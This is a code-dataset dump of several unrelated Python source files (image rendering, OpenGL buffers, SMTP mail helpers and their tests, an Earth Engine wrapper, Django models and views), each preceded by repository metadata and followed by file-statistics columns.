child_ids = fields.One2many('demo.hierarchy', 'parent_id', string='Contacts', domain=[('active', '=', True)])
active = fields.Boolean(default=True)
| 45.25 | 113 | 0.71639 | 66 | 543 | 5.787879 | 0.484848 | 0.136126 | 0.073298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004255 | 0.134438 | 543 | 11 | 114 | 49.363636 | 0.808511 | 0 | 0 | 0 | 0 | 0 | 0.244936 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a3a1db0c83fb48e078eb89e46de0dc28dfa86155 | 3,850 | py | Python | growth/microscopy/images.py | sebastianbernasek/growth | 6d1cace75b19ad8b6130d0940584c24dd26bbe91 | [
"MIT"
] | 1 | 2022-03-01T14:48:14.000Z | 2022-03-01T14:48:14.000Z | growth/microscopy/images.py | sbernasek/growth | 6d1cace75b19ad8b6130d0940584c24dd26bbe91 | [
"MIT"
] | null | null | null | growth/microscopy/images.py | sbernasek/growth | 6d1cace75b19ad8b6130d0940584c24dd26bbe91 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from copy import deepcopy
from ..measure import ConditionedLognormalSampler
class ScalarImage:
"""
Class containing a scalar image.
"""
def __init__(self, height=1000, width=1000):
""" Instantiate scalar image with shape (<height>, <width>). """
self.height = height
self.width = width
self.initialize()
@property
def shape(self):
""" Image shape. """
return self.im.shape[-2:]
@property
def pixels(self):
""" Returns image pixels. """
return self.im.ravel()
@property
def max(self):
""" Maximum pixel intensity. """
return self.im.max()
@property
def im_normalized(self):
""" Image normalized by the maximum value. """
return self.im/self.max
def percentile(self, q):
""" 98th percentile of pixel intensities. """
return np.percentile(self.im.ravel(), q=q)
def initialize(self):
""" Initialize blank image. """
self.im = np.zeros((self.height, self.width), dtype=np.float64)
def fill(self, mu=0.1, sigma=0.1):
"""
Fill image background with values sampled from a lognormal distribution.
Args:
mu (float) - mean of underlying normal distribution
sigma (float) - std dev of underlying normal distribution
"""
pixels = np.exp(np.random.normal(np.log(mu), sigma, size=self.shape))
self.im[:, :] = pixels
@staticmethod
def _render(im, vmin=0, vmax=None, cmap=plt.cm.Greys, size=5, ax=None):
"""
Render image.
Args:
im (np.ndarray[float]) - image
vmin, vmax (int) - colormap bounds
cmap (matplotlib.ColorMap or str) - if value is 'r', 'g', or 'b', use RGB colorscheme
size (int) - image panel size, in inches
ax (matplotlib.axes.AxesSubplot) - if None, create figure
"""
if ax is None:
fig, ax = plt.subplots(figsize=(size, size))
if vmax is None:
vmax = im.max()
# render image
if type(cmap) == str:
assert cmap in 'rgb', 'Color not recognized.'
im_rgb = np.zeros(im.shape+(3,), dtype=np.float64)
im_rgb[:,:,'rgb'.index(cmap)] = (im-vmin)/(vmax-vmin)
im_rgb[im_rgb>1.] = 1.
ax.imshow(im_rgb)
else:
ax.imshow(im, vmin=vmin, vmax=vmax, cmap=cmap)
# invert axis and remove ticks
ax.invert_yaxis()
ax.axis('off')
def render(self, **kwargs):
""" Render image. """
self._render(self.im.T, **kwargs)
def render_blank(self, **kwargs):
""" Render image. """
self._render(np.zeros(self.shape, dtype=int), **kwargs)
def center_xycoords(self, xy, shrinkage=0.9):
""" Project zero-centered coordinates to center of image. """
center_x, center_y = self.shape[0]/2, self.shape[1]/2
centered_xy = deepcopy(xy)
centered_xy[:, 0] = ((xy[:, 0]*center_x*shrinkage) + center_x)
centered_xy[:, 1] = ((xy[:, 1]*center_y*shrinkage) + center_y)
return centered_xy.astype(int)
class DependentScalarImage(ScalarImage):
"""
Class defines a scalar image whose pixel intensities are sampled with some dependence upon another scalar image.
"""
def __init__(self, pixels, mean, sigma):
""" Instantiate a dependent scalar image. """
super().__init__(*pixels.shape)
x = np.log(pixels.ravel())
self.sampler = ConditionedLognormalSampler(x, np.log(mean), sigma)
def fill(self, rho=0.0):
""" Generate randomly sampled pixel values. """
pixels = self.sampler.sample(rho=rho)
self.im[:, :] = pixels.reshape(self.shape)
| 29.166667 | 116 | 0.58 | 476 | 3,850 | 4.619748 | 0.323529 | 0.024557 | 0.021828 | 0.016371 | 0.048204 | 0.028195 | 0 | 0 | 0 | 0 | 0 | 0.013091 | 0.285714 | 3,850 | 131 | 117 | 29.389313 | 0.786545 | 0.279221 | 0 | 0.064516 | 0 | 0 | 0.01176 | 0 | 0 | 0 | 0 | 0 | 0.016129 | 1 | 0.225806 | false | 0 | 0.064516 | 0 | 0.419355 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a3a31d2b7e951a611f47c66f8f0512d348d90e5a | 2,674 | py | Python | PI/Platform/OpenGL/OpenGLBuffer.py | HotShot0901/PI | 7e6fd0f68b4222e09ea825f27709ec5b1e51e928 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null | PI/Platform/OpenGL/OpenGLBuffer.py | HotShot0901/PI | 7e6fd0f68b4222e09ea825f27709ec5b1e51e928 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null | PI/Platform/OpenGL/OpenGLBuffer.py | HotShot0901/PI | 7e6fd0f68b4222e09ea825f27709ec5b1e51e928 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null | from ...Renderer.Buffer import VertexBuffer, IndexBuffer, BufferLayout
from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData
from OpenGL.GL import GL_ARRAY_BUFFER, GL_STATIC_DRAW, GL_ELEMENT_ARRAY_BUFFER, GL_DYNAMIC_DRAW
import ctypes
import numpy as np
from multipledispatch import dispatch
class OpenGLVertexBuffer(VertexBuffer):
__slots__ = "__RendererID", "__itemsize", \
"__Layout"
@dispatch(list)
def __init__(self, vertices: list) -> None:
vertices: np.ndarray = np.array(vertices, dtype=np.float32)
self.__itemsize = vertices.itemsize
self.__RendererID = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_STATIC_DRAW)
@dispatch(int)
def __init__(self, size: int) -> None:
vertices = np.zeros((size,))
self.__itemsize = size
self.__RendererID = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, ctypes.c_void_p(None), GL_DYNAMIC_DRAW)
def __del__(self) -> None:
glDeleteBuffers(1, [self.__RendererID])
@property
def itemsize(self) -> int:
return self.__itemsize
@property
def RendererID(self) -> int:
return self.__RendererID
def Bind(self) -> None:
glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
def Unbind(self) -> None:
glBindBuffer(GL_ARRAY_BUFFER, 0)
def SetLayout(self, layout: BufferLayout) -> None:
self.__Layout = layout
def SetData(self, data: np.ndarray) -> None:
glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
glBufferSubData(GL_ARRAY_BUFFER, 0, data.nbytes, data.tobytes())
@property
def Layout(self) -> BufferLayout:
return self.__Layout
class OpenGLIndexBuffer(IndexBuffer):
__RendererID : int
__Count : int
def __init__(self, indices: list) -> None:
indices: np.ndarray = np.array(indices, dtype=np.uint32)
self.__Count = len(indices)
self.__RendererID = glGenBuffers(1)
self.Bind()
glBufferData(GL_ELEMENT_ARRAY_BUFFER, indices.nbytes, indices, GL_STATIC_DRAW)
def __del__(self) -> None:
glDeleteBuffers(1, [self.__RendererID])
@property
def RendererID(self) -> int:
return self.__RendererID
@property
def Count(self) -> int:
return self.__Count
def Bind(self) -> None:
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.__RendererID)
def Unbind(self) -> None:
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)
| 30.386364 | 96 | 0.686612 | 300 | 2,674 | 5.74 | 0.21 | 0.083043 | 0.067944 | 0.07259 | 0.384437 | 0.384437 | 0.367596 | 0.304878 | 0.255517 | 0.255517 | 0 | 0.005728 | 0.21653 | 2,674 | 87 | 97 | 30.735632 | 0.816229 | 0 | 0 | 0.375 | 0 | 0 | 0.011219 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.09375 | 0.078125 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a3a3535a3760b4a669fc2666b8b59489756d4ecc | 2,292 | py | Python | src/shinymud/lib/shinymail.py | shinymud/ShinyMUD | 3f659d8be4468c9a8745b8797f5f96c2bc86533c | [
"MIT"
] | 35 | 2015-01-06T12:01:38.000Z | 2022-01-22T13:57:26.000Z | src/shinymud/lib/shinymail.py | shinymud/ShinyMUD | 3f659d8be4468c9a8745b8797f5f96c2bc86533c | [
"MIT"
] | 1 | 2021-06-24T13:21:16.000Z | 2021-07-06T18:46:06.000Z | src/shinymud/lib/shinymail.py | shinymud/ShinyMUD | 3f659d8be4468c9a8745b8797f5f96c2bc86533c | [
"MIT"
] | 8 | 2015-02-04T16:30:52.000Z | 2021-02-03T15:02:38.000Z | from shinymud.data.config import EMAIL_HOST, EMAIL_PORT, EMAIL_HOST_USER,\
EMAIL_HOST_PASSWORD, EMAIL_USE_TLS
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
class ShinyMail(object):
"""ShinyMail constructs and sends emails."""
def __init__(self, to, subject, message='', from_addr=None):
"""Initialize our mail object.
to - a list of email addresses
subject - a string containing the email subject
message - a string containing the body of the email message (optional)
from_addr - a string containing the from address (optional, will be
replaced with EMAIL_HOST_USER from the shinymud config file if not given)
"""
self.email = MIMEMultipart()
self.email['Subject'] = subject
self.email['To'] = ', '.join(to)
self.email['From'] = from_addr or EMAIL_HOST_USER
self.message = message
self.files = []
def attach_text_file(self, filename, content):
"""Attach a text file to this email.
"""
msg = MIMEText(content)
msg.add_header('Content-Disposition', 'attachment', filename=filename)
self.files.append(msg)
def send(self):
"""Actually send an email.
"""
self._construct_email()
con = smtplib.SMTP(EMAIL_HOST, EMAIL_PORT)
con.set_debuglevel(1)
if EMAIL_USE_TLS:
con.starttls()
if EMAIL_HOST_USER and EMAIL_HOST_PASSWORD:
# Don't bother logging in if USER and PASS don't exist
con.login(EMAIL_HOST_USER, EMAIL_HOST_PASSWORD)
con.sendmail(self.email['From'], self.email['To'], self.email.as_string())
con.quit()
def _construct_email(self):
"""Construct the email in a sensible order.
Make sure the message text comes before any extra attachments.
"""
if self.message:
self.email.attach(MIMEText(self.message))
for f in self.files:
self.email.attach(f)
if not self.email.get_payload():
# Don't let people send blank emails. That's mean.
raise Exception("You can't send an email without any content!")
| 37.57377 | 82 | 0.622164 | 291 | 2,292 | 4.75945 | 0.38488 | 0.064982 | 0.046931 | 0.043321 | 0.043321 | 0.043321 | 0 | 0 | 0 | 0 | 0 | 0.000612 | 0.286649 | 2,292 | 60 | 83 | 38.2 | 0.846483 | 0.280541 | 0 | 0 | 0 | 0 | 0.061039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.088235 | 0.117647 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a3a46a9a0fdd89369c89e52d5dff21ccc01d5867 | 222 | py | Python | other/backpack.py | DanilaDanila/lessons | c9c2273e9cd6a8013c21eb889fc6a61f9cc3dfb7 | [
"MIT"
] | 4 | 2017-09-13T07:10:09.000Z | 2019-01-26T17:15:29.000Z | other/backpack.py | DanilaDanila/lessons | c9c2273e9cd6a8013c21eb889fc6a61f9cc3dfb7 | [
"MIT"
] | null | null | null | other/backpack.py | DanilaDanila/lessons | c9c2273e9cd6a8013c21eb889fc6a61f9cc3dfb7 | [
"MIT"
] | 4 | 2018-09-16T08:30:01.000Z | 2018-10-02T19:06:26.000Z | r = int(input())
w = [int(x) for x in input().split()]
c = [int(x) for x in input().split()]
m = [0]
for i in range(1, r + 1):
m.append(max([x[0] + m[i - x[1]] for x in zip(c, w) if x[1] <= i], default = 0))
print(m)
| 24.666667 | 84 | 0.509009 | 51 | 222 | 2.215686 | 0.392157 | 0.106195 | 0.159292 | 0.141593 | 0.353982 | 0.353982 | 0.353982 | 0 | 0 | 0 | 0 | 0.040698 | 0.225225 | 222 | 8 | 85 | 27.75 | 0.616279 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e55f659b3f5ad4fbe440e44abd370dbc1a901cb | 2,867 | py | Python | web/app/lib/earthengine/__init__.py | geary/claslite | 83c49cf98eceae633034b82d35ed7991d943b857 | [
"Unlicense"
] | null | null | null | web/app/lib/earthengine/__init__.py | geary/claslite | 83c49cf98eceae633034b82d35ed7991d943b857 | [
"Unlicense"
] | null | null | null | web/app/lib/earthengine/__init__.py | geary/claslite | 83c49cf98eceae633034b82d35ed7991d943b857 | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Earth Engine interface
~~~~~~~~~~~~~~~~~~~~
:By Michael Geary - http://mg.to/
:See UNLICENSE or http://unlicense.org/ for public domain notice.
"""
import cgi, logging, sys, os
import ee
from oauth2client import appengine
from google.appengine.api import urlfetch, users
from google.appengine.ext import db
from tipfy import current_handler
from tipfy.utils import json_decode
class EarthEngine( object ):
def __init__( self, handler ):
self.url = handler.get_config( 'earth-engine', 'api' )
account = handler.get_config( 'earth-engine', 'ee_account' )
key = handler.get_config( 'earth-engine', 'ee_private_key_file' )
DEBUG_MODE = ('SERVER_SOFTWARE' in os.environ and
os.environ['SERVER_SOFTWARE'].startswith('Dev'))
if DEBUG_MODE:
EE_API_URL = 'https://earthengine.sandbox.google.com'
EE_CREDENTIALS = ee.ServiceAccountCredentials(account, key)
else:
EE_API_URL = 'https://earthengine.googleapis.com'
EE_CREDENTIALS = appengine.AppAssertionCredentials(ee.OAUTH2_SCOPE)
# Initialize the EE API
EE_TILE_SERVER = EE_API_URL + '/map/'
ee.data.DEFAULT_DEADLINE = 60 * 20
logging.info('Initializing with ' + EE_API_URL)
ee.Initialize(EE_CREDENTIALS, EE_API_URL)
def _http( self, method, url, params=None ):
logging.info( 'EarthEngine %s:\n%s', url, params )
try:
response = urlfetch.fetch(
method = method,
url = self.url + url,
payload = params,
deadline = 10
)
if response.status_code == 200:
json = json_decode( response.content )
else:
json = { 'error': { 'type':'http', 'code': response.status_code } }
except urlfetch.DeadlineExceededError:
json = { 'error': { 'type':'DeadlineExceededError' } }
except urlfetch.DownloadError:
json = { 'error': { 'type':'DownloadError' } }
except urlfetch.ResponseTooLargeError:
json = { 'error': { 'type':'ResponseTooLargeError' } }
except:
json = { 'error': { 'type':'Other' } }
finally:
return json
def get( self, api, params=None ):
if params: url = api + '?' + params
else: url = api
return self._http( 'GET', url )
def post( self, api, params=None ):
return self._http( 'POST', api, params )
class EarthImage( object ):
def __init__( self ):
pass
def obj( self, type, id ):
return {
'type': type,
'id': id,
}
def step( self, creator, *args ):
return {
'type': 'Image',
'creator': creator,
'args': args,
}
def clip( self, image ):
key = db.Key( current_handler.session['current_place'] )
if key is None:
return image
place = db.get( key )
if place is None:
return image
if place.owner != current_handler.auth.user.auth_id:
return image
g = json_decode( place.geojson )
coords = g['features'][0]['geometry']['coordinates']
return self.image( 'ClipToMultiPolygon', image, coords )
| 27.04717 | 74 | 0.662714 | 360 | 2,867 | 5.141667 | 0.369444 | 0.016207 | 0.02161 | 0.034036 | 0.071853 | 0.031334 | 0 | 0 | 0 | 0 | 0 | 0.005628 | 0.19428 | 2,867 | 105 | 75 | 27.304762 | 0.795671 | 0.014998 | 0 | 0.088608 | 0 | 0 | 0.157539 | 0.015754 | 0 | 0 | 0 | 0 | 0.012658 | 0 | null | null | 0.025316 | 0.088608 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e575f91b4f65ce3d3bbf1ec3b977c4df6df2202 | 4,014 | py | Python | tests/coworks/blueprint/test_mail.py | sidneyarcidiacono/coworks | 7f51b83e8699ced991d16a5a43ad19e569b6e814 | [
"MIT"
] | null | null | null | tests/coworks/blueprint/test_mail.py | sidneyarcidiacono/coworks | 7f51b83e8699ced991d16a5a43ad19e569b6e814 | [
"MIT"
] | null | null | null | tests/coworks/blueprint/test_mail.py | sidneyarcidiacono/coworks | 7f51b83e8699ced991d16a5a43ad19e569b6e814 | [
"MIT"
] | null | null | null | import os
import smtplib
from email import message
from io import BytesIO
from unittest import mock
import pytest
from coworks import TechMicroService
from coworks.blueprint.mail_blueprint import Mail
from coworks.config import LocalConfig
smtp_mock = mock.MagicMock()
smtp_mock.return_value.__enter__.return_value.login = login_mock = mock.Mock()
smtp_mock.return_value.__enter__.return_value.send_message = send_mock = mock.Mock()
email_mock = mock.MagicMock()
email_mock.return_value.add_attachment = add_mock = mock.Mock()
class MailMS(TechMicroService):
def __init__(self, **mail_names):
super().__init__('mail', configs=LocalConfig())
self.register_blueprint(Mail(**mail_names))
def _check_token(self):
return True
class TestClass:
def test_wrong_init(self):
with pytest.raises(OSError) as pytest_wrapped_e:
app = MailMS()
with app.test_client() as c:
response = c.post('/send')
assert pytest_wrapped_e.type == OSError
@mock.patch.dict(os.environ, {
"SMTP_SERVER": "mail.test.com:587",
"SMTP_LOGIN": "myself@test.com",
"SMTP_PASSWD": "passwd"
})
def test_wrong_params(self):
mail_names = {
'env_server_var_name': 'SMTP_SERVER',
'env_login_var_name': 'SMTP_LOGIN',
'env_passwd_var_name': 'SMTP_PASSWD',
}
app = MailMS(**mail_names)
with app.test_client() as c:
data = {
'subject': "Test",
}
response = c.post('/send', data=data)
assert response.status_code == 400
assert response.get_data(as_text=True) == "From address not defined (from_addr:str)"
@mock.patch.dict(os.environ, {
"SMTP_SERVER": "mail.test.com:587",
"SMTP_LOGIN": "myself@test.com",
"SMTP_PASSWD": "passwd"
})
def test_wrong_params(self, auth_headers):
app = MailMS(env_var_prefix='SMTP')
with app.test_client() as c:
data = {
'subject': "Test",
}
response = c.post('/send', data=data, headers=auth_headers)
assert response.status_code == 400
assert response.get_data(as_text=True) == "From address not defined (from_addr:str)"
@mock.patch.dict(os.environ, {
"SMTP_SERVER": "mail.test.com:587",
"SMTP_LOGIN": "myself@test.com",
"SMTP_PASSWD": "passwd"
})
@mock.patch.object(smtplib, 'SMTP', smtp_mock)
def test_send_text(self, auth_headers):
app = MailMS(env_var_prefix='SMTP')
with app.test_client() as c:
data = {
'subject': "Test",
'from_addr': "from@test.fr",
'to_addrs': "to@test.fr",
}
response = c.post('/send', data=data, headers=auth_headers)
assert response.status_code == 200
assert response.get_data(as_text=True) == "Mail sent to to@test.fr"
login_mock.assert_called_with('myself@test.com', 'passwd')
send_mock.assert_called_once()
@mock.patch.dict(os.environ, {
"SMTP_SERVER": "mail.test.com:587",
"SMTP_LOGIN": "myself@test.com",
"SMTP_PASSWD": "passwd"
})
@mock.patch.object(smtplib, 'SMTP', smtp_mock)
@mock.patch.object(message, 'EmailMessage', email_mock)
def test_send_attachment(self, auth_headers):
app = MailMS(env_var_prefix='SMTP')
with app.test_client() as c:
file = BytesIO(b"hello {{ world_name }}")
data = {
'subject': "Test",
'from_addr': "from@test.fr",
'to_addrs': "to@test.fr",
'attachments': [(file, 'file.txt')]
}
response = c.post('/send', data=data, headers=auth_headers)
assert response.status_code == 200
login_mock.assert_called_with('myself@test.com', 'passwd')
add_mock.assert_called_once()
| 34.904348 | 96 | 0.598655 | 488 | 4,014 | 4.665984 | 0.196721 | 0.030742 | 0.034256 | 0.03733 | 0.600351 | 0.600351 | 0.591568 | 0.547211 | 0.547211 | 0.508564 | 0 | 0.008219 | 0.272546 | 4,014 | 114 | 97 | 35.210526 | 0.771575 | 0 | 0 | 0.53 | 0 | 0 | 0.183607 | 0 | 0 | 0 | 0 | 0 | 0.12 | 1 | 0.07 | false | 0.07 | 0.09 | 0.01 | 0.19 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6e674bba7e974aef69c88702fb52e95d608c0be3 | 2,101 | py | Python | whattowatch/core/models.py | svhenrique/What-To-Watch-backend | 3bab4ad825e13eead9dae23d68b5f91cd6133720 | [
"MIT"
] | null | null | null | whattowatch/core/models.py | svhenrique/What-To-Watch-backend | 3bab4ad825e13eead9dae23d68b5f91cd6133720 | [
"MIT"
] | 5 | 2022-02-15T04:29:33.000Z | 2022-03-25T03:09:23.000Z | whattowatch/core/models.py | svhenrique/What-To-Watch-backend | 3bab4ad825e13eead9dae23d68b5f91cd6133720 | [
"MIT"
] | null | null | null | from tabnanny import verbose
from embed_video.fields import EmbedVideoField
from core.utils import get_file_path
from django.db import models
from pydoc import describe
CHOICES_RATTING = [
(0, "L"),
(10, "10"),
(12, "12"),
(14, "14"),
(16, "16"),
(18, "18"),
]
class Base(models.Model):
created_at = models.DateField('Criação', auto_now_add=True)
updated_at = models.DateField('Atualização', auto_now=True)
active = models.BooleanField('Ativo', default=True)
class Meta:
abstract = True
class WatchableContent(Base):
title = models.TextField(verbose_name="Título")
description = models.TextField(verbose_name='Descrição')
ratting_age = models.IntegerField(choices=CHOICES_RATTING)
poster = models.ImageField(verbose_name='Poster', upload_to=get_file_path, max_length=50)
genres = models.TextField(verbose_name="Gêneros")
release_date = models.DateField(verbose_name="Data de Lançamento", null=True, blank=True)
daily_views = models.PositiveIntegerField(verbose_name="Vizualizações Diária", default=0)
week_views = models.PositiveIntegerField(verbose_name="Vizualizações Semanal",default=0)
year_views = models.PositiveIntegerField(verbose_name="Vizualizações Anual", default=0)
def __str__(self):
return self.title
class Episode(Base):
name = models.TextField(verbose_name="Nome")
episode = models.PositiveIntegerField(verbose_name="Vizualizações Diária", default=0)
content = models.ForeignKey(verbose_name="Conteúdo", to=WatchableContent, on_delete=models.CASCADE, related_name="episodes")
description = models.TextField(verbose_name="Descrição")
season = models.PositiveIntegerField(verbose_name="Temporada")
video = EmbedVideoField()
def __str__(self):
return self.name
class HighlightedArea(Base):
contents = models.ManyToManyField(verbose_name="Conteúdo", to=WatchableContent)
title = models.TextField(verbose_name="Título")
genres = models.TextField(verbose_name="Gêneros")
position = models.PositiveIntegerField(verbose_name="Posição")
| 38.2 | 128 | 0.741552 | 244 | 2,101 | 6.196721 | 0.413934 | 0.123677 | 0.101852 | 0.12037 | 0.397487 | 0.32209 | 0.084656 | 0.084656 | 0 | 0 | 0 | 0.014992 | 0.142789 | 2,101 | 54 | 129 | 38.907407 | 0.824542 | 0 | 0 | 0.133333 | 0 | 0 | 0.107568 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.111111 | 0.044444 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e693366aa73c3e5190dfeb165652aeea6e62694 | 515 | py | Python | test/test_markdown_converter.py | wgroeneveld/dokuwiki-to-hugo | cfe7193d8b040e2352b7a9bc83fffa7c1c5a859e | [
"MIT"
] | 8 | 2017-04-14T19:17:24.000Z | 2022-02-02T00:03:25.000Z | test/test_markdown_converter.py | wgroeneveld/dokuwiki-to-hugo | cfe7193d8b040e2352b7a9bc83fffa7c1c5a859e | [
"MIT"
] | 4 | 2017-05-26T18:11:10.000Z | 2020-07-25T09:09:26.000Z | test/test_markdown_converter.py | wgroeneveld/dokuwiki-to-hugo | cfe7193d8b040e2352b7a9bc83fffa7c1c5a859e | [
"MIT"
] | 5 | 2017-08-12T09:59:43.000Z | 2021-02-26T14:28:23.000Z | from unittest import TestCase
from pathlib import Path
from src.markdown_converter import MarkdownConverter
class TestMarkdownHeader(TestCase):
def setUp(self):
self.converter = MarkdownConverter("test/dokuwiki_example.txt")
def test_acceptance_test_case(self):
# python 3.5 and up
expected = Path("test/expected_markdown_output.txt").read_text()
actual = self.converter.convert()
print(actual)
self.assertEqual(expected, actual, "Files not matching!")
| 27.105263 | 72 | 0.718447 | 60 | 515 | 6.033333 | 0.616667 | 0.071823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004819 | 0.194175 | 515 | 18 | 73 | 28.611111 | 0.86747 | 0.03301 | 0 | 0 | 0 | 0 | 0.155242 | 0.116935 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.181818 | false | 0 | 0.272727 | 0 | 0.545455 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e69531f478f33e6136dd7686cb0bcc4caa4db53 | 1,559 | py | Python | environ/blog/views.py | CassandraTalbot32/Python-Django-CSS-HTML-JavaScript-webiste | de81b971026991c6689a133e68582b04431ae265 | [
"MIT"
] | null | null | null | environ/blog/views.py | CassandraTalbot32/Python-Django-CSS-HTML-JavaScript-webiste | de81b971026991c6689a133e68582b04431ae265 | [
"MIT"
] | null | null | null | environ/blog/views.py | CassandraTalbot32/Python-Django-CSS-HTML-JavaScript-webiste | de81b971026991c6689a133e68582b04431ae265 | [
"MIT"
] | null | null | null | from django.shortcuts import render, get_object_or_404
from django.urls import reverse
# Create your views here.
from django.views.generic import (
CreateView,
DetailView,
ListView,
UpdateView,
ListView,
DeleteView
)
from .forms import ArticleModelForm
from .models import Article
class ArticleCreateView(CreateView):
template_name = 'articles/article_create.html'
form_class = ArticleModelForm
queryset = Article.objects.all()
#success_url = '/'
def form_valid(self, form):
print(form.cleaned_data)
return super().form_valid(form)
#def get_success_url(self):
#return '/'
class ArticleListView(ListView):
template_name = 'articles/article_list.html'
queryset = Article.objects.all()
class ArticleDetailView(DetailView):
template_name = 'articles/article_detail.html'
queryset = Article.objects.all()
def get_object(self):
id_ = self.kwargs.get("id")
return get_object_or_404(Article, id=id_)
class ArticleUpdateView(UpdateView):
template_name = 'articles/article_create.html'
form_class = ArticleModelForm
queryset = Article.objects.all()
def get_object(self):
id_ = self.kwargs.get("id")
return get_object_or_404(Article, id=id_)
def form_valid(self, form):
print(form.cleaned_data)
return super().form_valid(form)
class ArticleDeleteView(DeleteView):
template_name = 'articles/article_delete.html'
queryset = Article.objects.all()
def get_object(self):
id_ = self.kwargs.get("id")
return get_object_or_404(Article, id=id_)
def get_success_url(self):
return reverse('articles:article-list')
| 23.621212 | 54 | 0.766517 | 205 | 1,559 | 5.614634 | 0.263415 | 0.054735 | 0.086881 | 0.117289 | 0.549957 | 0.524761 | 0.482189 | 0.482189 | 0.482189 | 0.482189 | 0 | 0.008785 | 0.123797 | 1,559 | 65 | 55 | 23.984615 | 0.833821 | 0.048749 | 0 | 0.565217 | 0 | 0 | 0.111637 | 0.107578 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.108696 | 0.021739 | 0.73913 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
